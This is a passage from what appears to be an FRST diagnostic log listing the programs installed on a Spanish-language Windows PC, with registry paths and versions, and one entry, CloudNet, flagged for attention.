Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.10 - Atheros Communications Inc.)
Atheros Driver Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 8.0.0.171 - Atheros)
AutoPlay Media Studio 8 Personal Edition (HKLM-x32\...\AutoPlay Media Studio 8 Personal Edition) (Version: 8.0.1.1 - Indigo Rose Corporation)
Backup Manager Basic (HKLM-x32\...\{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.29 - NewTech Infosystems) Hidden
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.307.8213 - BlueStack Systems, Inc.)
CambridgeSoft Activation Client (HKLM-x32\...\{E773E0B9-6ABE-4F9E-816C-56B2DD8613B9}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ChemOffice Ultra 2010 (HKLM-x32\...\{D5402C39-C1C1-48F6-99C2-36C7937EE7EB}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ChemScript 12.0 (HKLM-x32\...\{E145D9BE-D521-4527-A85D-2B2D47725506}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ENotebook 12.0.1 (HKLM-x32\...\{F596E368-2A1D-4896-AB37-C81BFA4DD011}) (Version: 12.0.1 - CambridgeSoft Corporation)
Camtasia Studio 8 (HKLM-x32\...\{B1F8F5EB-75E2-40C3-9A50-7907F1C910F1}) (Version: 8.0.3.994 - TechSmith Corporation)
CBTL_TwitterImageDownloader (HKLM-x32\...\{2223143E-3B2D-46B4-BD2F-B6DEAED131EF}) (Version: 2.00.0000 - Code Between The Lines)
CCleaner (HKLM\...\CCleaner) (Version: 5.60 - Piriform)
Chicken Invaders 2 (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110209593}) (Version:  - Oberon Media)
CloudNet (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATENCIÓN
CollageIt 1.1.6 (HKLM-x32\...\{D9757258-30B2-496E-86F2-84920C5858E1}_is1) (Version:  - PearlMountain Soft)
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
ConvertHelper 3.1.1 (HKLM\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF52}}_is1) (Version:  - DownloadHelper)
CoreAAC (HKLM-x32\...\CoreAAC) (Version:  - )
CPUID CPU-Z 1.86 (HKLM\...\CPUID CPU-Z_is1) (Version: 1.86 - CPUID, Inc.)
CyberGhost 6 (HKLM\...\CyberGhost 6_is1) (Version:  - CyberGhost S.R.L.)
CyberLink PowerDVD 8 (HKLM-x32\...\InstallShield_{2BF2E31F-B8BB-40A7-B650-98D28E0F7D47}) (Version: 8.1.3405.50 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Dairy Dash (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-115053100}) (Version:  - Oberon Media)
Descargador de Video de Apowersoft V6.2.1 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.1 - APOWERSOFT LIMITED)
DjVuLibre+DjView (HKLM-x32\...\DjVuLibre+DjView) (Version: 3.5.24+4.7c - DjVuZone)
Dream Day First Home (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version:  - Oberon Media)
EaseUS Data Recovery Wizard 6.1 (HKLM-x32\...\EaseUS Data Recovery Wizard 6.1_is1) (Version:  - EaseUS)
Eines de correcció del Microsoft Office 2016: català (HKLM-x32\...\{90160000-001F-0403-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Electrum (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Electrum) (Version: 3.2.2 - Electrum Technologies GmbH)
eSobi v2 (HKLM-x32\...\{15D967B5-A4BE-42AE-9E84-64CD062B25AA}) (Version: 2.0.4.000274 - esobi Inc.) Hidden
eSobi v2 (HKLM-x32\...\InstallShield_{15D967B5-A4BE-42AE-9E84-64CD062B25AA}) (Version: 2.0.4.000274 - esobi Inc.)
EVEREST Ultimate Edition v4.60 (HKLM-x32\...\EVEREST Ultimate Edition_is1) (Version: 4.60 - Lavalys, Inc.)
ExamDiff Pro 8.0 (8.0.1.2, 64-bit) (HKLM\...\ExamDiff Pro 8.0_is1) (Version: 8.0.1.2 - PrestoSoft LLC)
ExpressVPN (HKLM-x32\...\{4520629e-a2a3-4646-81b1-ed6e089a24be}) (Version: 7.2.3.9028 - ExpressVPN)
ExpressVPN (HKLM-x32\...\{E5B9C3E5-889C-4F22-A959-F4B846EDAB75}) (Version: 7.2.3.9028 - ExpressVPN) Hidden
Farm Frenzy 2 (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11531173}) (Version:  - Oberon Media)
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM-x32\...\{90160000-001F-0456-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
First Class Flurry (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-115208410}) (Version:  - Oberon Media)
Free Download Manager (HKLM\...\{43781dff-e0df-49ce-a6d2-47da96a485e7}}_is1) (Version:  - FreeDownloadManager.ORG)
Free Studio version 5.3.5 (HKLM-x32\...\Free Studio_is1) (Version: 5.3.5 - DVDVideoSoft Ltd.)
Galería fotográfica de Windows Live (HKLM-x32\...\{E85A4EFC-82F2-4CEE-8A8E-62FDAD353A66}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
GetFLV 9.7.6.9 (HKLM-x32\...\GetFLV_is1) (Version:  - GetFLV, Inc.)
GOM Player (HKLM-x32\...\GOM Player) (Version: 2.3.51.5315 - GOM & Company)
GOM Remote (HKLM-x32\...\GOM Remote) (Version: 2.1.1.5 - GOM & Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 80.0.3987.149 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Granny In Paradise (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110551697}) (Version:  - Oberon Media)
guaca Screen Saver (HKLM-x32\...\guaca) (Version:  - )
Heroes of Hellas (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113786380}) (Version:  - Oberon Media)
Herramientas de corrección de Microsoft Office 2016: español (HKLM-x32\...\{90160000-001F-0C0A-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
HP Update (HKLM-x32\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HTTP Analyzer V7.6.4 (HKLM-x32\...\{8DF9C507-AB88-43E4-A4F0-E2E493C4B0CE}_is1) (Version: 7.6.4 - IEInspector Software)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3002 - Acer Incorporated)
ImagXpress (HKLM-x32\...\{A8F2089B-1F79-4BF6-B385-A2C2B0B9A74D}) (Version: 7.0.74.0 - Nero AG) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1892 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
IsoBuster 2.8.5 (HKLM-x32\...\IsoBuster_is1) (Version: 2.8.5 - Smart Projects)
Jaksta Streaming Media Recorder (HKLM\...\{04FE9AD5-1ABC-4297-B2A5-6495D4977B4B}) (Version: 4.1.1 - Applian Technologies)
Java 8 Update 201 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180201F0}) (Version: 8.0.2010.9 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (HKLM-x32\...\{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
K-Lite Codec Pack 8.9.2 (Full) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 8.9.2 - )
KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.2.2.34 - PandoraTV)
Launch Manager (HKLM-x32\...\LManager) (Version: 3.0.03 - Acer Inc.)
Lupas Rename 2000 v5.0 Release (HKLM-x32\...\Lupas Rename 2000_is1) (Version:  - Ivan Anton Albarracin)
Malwarebytes version 4.1.0.56 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.1.0.56 - Malwarebytes)
Marco trabajo apl. capa datos de Microsoft SQL Server 2008 R2 (HKLM-x32\...\{B65527FD-47DD-4A07-9E07-64DA91B0A34A}) (Version: 10.50.1447.4 - Microsoft Corporation)
Mendeley Desktop 1.17.9 (HKLM-x32\...\Mendeley Desktop) (Version: 1.17.9 - Mendeley Ltd.)
Merriam Websters Spell Jam (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112662477}) (Version:  - Oberon Media)
Mesh Runtime (HKLM-x32\...\{8C6D6116-B724-4810-8F2D-D047E6B7D68E}) (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (HKLM-x32\...\{939C80FA-96C9-44A6-B318-8E7D8BD8481B}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
MestReNova LITE 5.2.5-4731 (HKLM-x32\...\MestReNova LITE) (Version: 5.2.5-4731 - Mestrelab Research S.L.)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.8 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.8.03761 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - ESN (HKLM-x32\...\{B0DF0057-EF87-471D-A80A-DC1F0463BA19}) (Version: 2.0.50331.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools - ESN (HKLM-x32\...\{4F19E81D-168E-4E0B-A4B7-AA246FBE3FBB}) (Version: 2.0.50414.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools (HKLM-x32\...\{40416836-56CC-4C0E-A6AF-5C34BADCE483}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{1803A630-3C38-4D2B-9B9A-0CB37243539C}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft Help Viewer 1.0 (HKLM\...\Microsoft Help Viewer 1.0) (Version: 1.0.30319 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0100-0C0A-0000-0000000FF1CE}_OMUI.es-es_{D79E9128-A250-4155-BE90-2BE81DE0406A}) (Version:  - Microsoft)
Microsoft Office Excel 2007 Help Actualización (KB963678) (HKLM-x32\...\{90120000-0016-0C0A-0000-0000000FF1CE}_OMUI.es-es_{59E09C3D-4878-47D9-87DB-6D0018026889}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Language Pack 2007 - Spanish/Español (HKLM-x32\...\OMUI.es-es) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Outlook 2007 Help Actualización (KB963677) (HKLM-x32\...\{90120000-001A-0C0A-0000-0000000FF1CE}_OMUI.es-es_{59C244C2-0C37-4E85-8F7E-DBDD3958B694}) (Version:  - Microsoft)
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0C0A-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Office Powerpoint 2007 Help Actualización (KB963669) (HKLM-x32\...\{90120000-0018-0C0A-0000-0000000FF1CE}_OMUI.es-es_{F318245D-05AE-4681-A749-A036CE44AF29}) (Version:  - Microsoft)
Microsoft Office Professional Plus 2016 (HKLM-x32\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Word 2007 Help Actualización (KB963665) (HKLM-x32\...\{90120000-001B-0C0A-0000-0000000FF1CE}_OMUI.es-es_{377BA42A-1C84-45D6-94B8-6D00887D172D}) (Version:  - Microsoft)
Microsoft OneDrive (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\OneDriveSetup.exe) (Version: 17.3.4604.0120 - Microsoft Corporation)
Microsoft Outlook Social Connector Provider for Windows Live Messenger 32-bit (HKLM-x32\...\{95140000-007D-0409-0000-0000000FF1CE}) (Version: 14.0.5120.5000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft Silverlight 3 SDK - Español (HKLM-x32\...\{8D8C5BD0-7FC7-4680-B527-218F63920E03}) (Version: 3.0.40818.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 (64-bit) (HKLM\...\Microsoft SQL Server 10 Release) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 Browser (HKLM-x32\...\{10E05081-646C-4130-A166-83283A3A0A45}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{12F3060C-64C4-4872-BB3C-4DCBA7877987}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Project (HKLM-x32\...\{F188B6ED-4537-4CAC-A4DE-3BD30E6114C6}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Transact-SQL Language Service (HKLM-x32\...\{6C239446-F196-44DC-9148-8D912895D097}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ESN (HKLM-x32\...\{2A78694E-ACFE-4D5A-9B0F-C0EBEFA3F280}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ESN (HKLM\...\{24965A31-311D-462D-BAA8-B482ABA115D8}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Database Publishing Wizard 1.4 (HKLM-x32\...\{ACE28263-76A4-4BF5-B6F4-8BD719595969}) (Version: 10.1.2512.8 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{79BF7CB8-1E09-489F-9547-DB3EE8EA3F16}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{46878B08-238C-4F28-9194-9D8604A7F52E}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (x64) (HKLM\...\{CD9B2BA6-F699-4700-81B9-CD28C0BC693C}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{DE63A8FE-80A6-4CA3-ACEA-F954B6370596}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft Sync Framework Runtime v1.0 SP1 (x64) es (HKLM\...\{2D6232BE-CDB4-4EE7-AFCB-1541E12041E9}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework SDK v1.0 SP1 es (HKLM-x32\...\{EF948EA2-FA97-4312-BA36-88D76048CCE8}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework Services v1.0 SP1 (x64) es (HKLM\...\{C69733F2-4140-440F-938E-2D47C6CB1C70}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Services for ADO.NET v2.0 SP1 (x64) es (HKLM\...\{1C3998E1-8501-455C-B829-5031520EBC94}) (Version: 2.0.3010.0 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM-x32\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Designtime - 10.0.30319 (HKLM\...\{61B42D05-EBFA-3896-A267-B71CD3025BC5}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Runtime - 10.0.30319 (HKLM\...\{94D70749-4281-39AC-AD90-B56A0E0A402E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.30319 (HKLM-x32\...\{6A86554B-8928-30E4-A53C-D7337689134D}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24123 (HKLM-x32\...\{206898cc-4b41-4d98-ac28-9f9ae57f91fe}) (Version: 14.0.24123.0 - Microsoft Corporation)
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{729A3000-BC8A-3B74-BA5D-5068FE12D70C}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM-x32\...\{817C2DCF-4DD7-3C32-8A8E-7CEFF137E543}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools - ESN Language Pack (HKLM-x32\...\Microsoft Visual Studio Macro Tools - ESN Language Pack) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools (HKLM-x32\...\Microsoft Visual Studio Macro Tools) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{38BB21D5-B0D1-41DA-A0B0-1EFB5EF4AAC2}) (Version: 9.7.0621 - Microsoft Corporation)
Modelo de objetos de Microsoft Team Foundation Server 2010 - ESN (HKLM\...\Microsoft Team Foundation Server 2010 Object Model - ESN) (Version: 10.0.30319 - Microsoft Corporation)
Movavi Video Converter 19 Premium (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Movavi Video Converter 19 Premium) (Version: 19.3.0 - Movavi)
Mozilla Firefox 74.0 (x64 es-MX) (HKLM\...\Mozilla Firefox 74.0 (x64 es-MX)) (Version: 74.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 74.0.0.7373 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyWinLocker (HKLM-x32\...\{68301905-2DEA-41CE-A4D4-E8B443B099BA}) (Version: 3.1.76.0 - Egis Technology Inc.)
MZ-Tools 3.0 para VBA (HKLM-x32\...\{2B69AD59-FA30-47fc-B950-FA27E7D16A73}_is1) (Version:  - MZTools Software)
NeoDownloader 2.8 (HKLM-x32\...\{E76CDDCE-EFC0-4FE5-9972-9489CE49AA55}_is1) (Version: 2.7 - Neowise Software)
Nero 12 (HKLM-x32\...\{560FC78C-A4B2-461D-9B47-820C1EEF87B8}) (Version: 12.0.02000 - Nero AG)
NetLimiter 3 (HKLM\...\{913923AB-3AAB-4870-8910-627C4CD82789}) (Version: 3.0.0.11 - Locktime Software s.r.o.)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.5.5 - Notepad++ Team)
NTI Backup Now 5 (HKLM-x32\...\InstallShield_{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.627 - NewTech Infosystems)
NTI Backup Now Standard (HKLM-x32\...\{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.627 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6623 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6623 - NewTech Infosystems)
Nuance PDF Converter Professional 7 (HKLM\...\{F8001A0F-C0E6-4593-88AB-F2FB726C274E}) (Version: 7.10.6403 - Nuance Communications, Inc)
Objetos de administración de Microsoft SQL Server 2008 R2 (HKLM-x32\...\{6438BDAD-CE12-4D38-B1C4-42F94F08408F}) (Version: 10.50.1447.4 - Microsoft Corporation)
Objetos de administración de Microsoft SQL Server 2008 R2 (x64) (HKLM\...\{2040D407-91F5-48F3-9A81-B084573D0577}) (Version: 10.50.1447.4 - Microsoft Corporation)
Optical Drive Power Management (HKLM-x32\...\{AE09C972-EEB2-4DA5-8090-0FCF54576854}) (Version: 1.01.3002 - Acer Incorporated)
Origin8 (HKLM-x32\...\{D7452A01-9BF9-4FFD-8B2E-650F713AE099}) (Version: 8.00.000 - OriginLab) Hidden
OriginPro 8 (HKLM-x32\...\{A912021A-FEDD-4DA3-8DB4-245EBDA84778}) (Version: 8.00.000 - OriginLab Corporation)
Paint.NET v3.5.11 (HKLM\...\{72EF03F5-0507-4861-9A44-D99FD4C41418}) (Version: 3.61.0 - dotPDN LLC)
Paquete de controladores de Windows - eMPIA Technology Inc, (etAudio) MEDIA  (01/09/2007 2.7.0109.0) (HKLM\...\1849833E0162CE51DBEADAF36FE5A044F926B2FE) (Version: 01/09/2007 2.7.0109.0 - eMPIA Technology Inc,)
Paquete de idioma de Microsoft Visual F# 2.0 Runtime - ESN (HKLM-x32\...\{7CCA8BD3-005C-3195-806B-501E6D3D242B}) (Version: 10.0.30319 - Microsoft Corporation)
Paquete de idioma de Microsoft Visual Studio 2010 Tools para Office Runtime (x64) - ESN (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - ESN) (Version: 10.0.50903 - Microsoft Corporation)
Paquete de idioma del Visor de Ayuda de Microsoft 3.0 - ESN (HKLM\...\Microsoft Help Viewer 1.0 Language Pack - ESN) (Version: 1.0.30319 - Microsoft Corporation)
PDF Password Remover v3.1 (HKLM-x32\...\PDF Password Remover v3.1_is1) (Version:  - VeryPDF.com Inc)
Picture Merge Genius 2.8 (HKLM-x32\...\Picture Merge Genius_is1) (Version:  - EasyTools,Inc)
Polymath 6.0 (HKLM-x32\...\{95730541-F084-4B2D-92A0-0270E18EA29E}) (Version: 6.00.0204.7 - Polymath Software)
PowerISO (HKLM-x32\...\PowerISO) (Version:  - )
Prerequisite installer (HKLM-x32\...\{3AAB08A3-F129-4BD5-B409-AE674F93759D}) (Version: 12.0.0002 - Nero AG) Hidden
Progress Telerik Fiddler (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Fiddler2) (Version: 5.0.20182.28034 - Telerik)
Proxy Finder (HKLM-x32\...\Proxy Finder) (Version:  - )
Python 2.5 (HKLM-x32\...\{0A2C5854-557E-48C8-835A-3B9F074BDCAA}) (Version: 2.5.150 - Martin v. Löwis)
QuickTime (HKLM-x32\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
Raptor 3 (HKLM-x32\...\Raptor_is1) (Version:  - madmax)
RAR Password Unlocker 4.2.0.0 (HKLM-x32\...\{B789FA51-6A71-408F-92DE-EDE4A517B8F9}_is1) (Version:  - Password Unlocker Studio)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5911 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30093 - Realtek Semiconductor Corp.)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM-x32\...\{90160000-001F-0416-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Revo Uninstaller 2.1.1 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.1.1 - VS Revo Group, Ltd.)
RonyaSoft CD DVD Label Maker 3.02 (HKLM-x32\...\RonyaSoft CD DVD Label Maker) (Version: 3.02 - RonyaSoft)
Samsung Auto Backup (HKLM-x32\...\{821D6F49-1B20-4809-8C73-286CFC52B1B1}) (Version: 4.1.371.0 - Clarus)
Samsung SecretZone (HKLM-x32\...\{66491E5A-7899-4863-A2E9-057E10BCB578}) (Version: 1.00.0000 - Clarus)
Scansoft PDF Professional (HKLM-x32\...\{068724F8-D8BE-4B43-8DDD-B9FE9E49FD76}) (Version:  - ) Hidden
Scientific WorkPlace 4.0 (HKLM-x32\...\{3FDA5DE5-5606-11D5-821A-00104BD1670F}) (Version:  - )
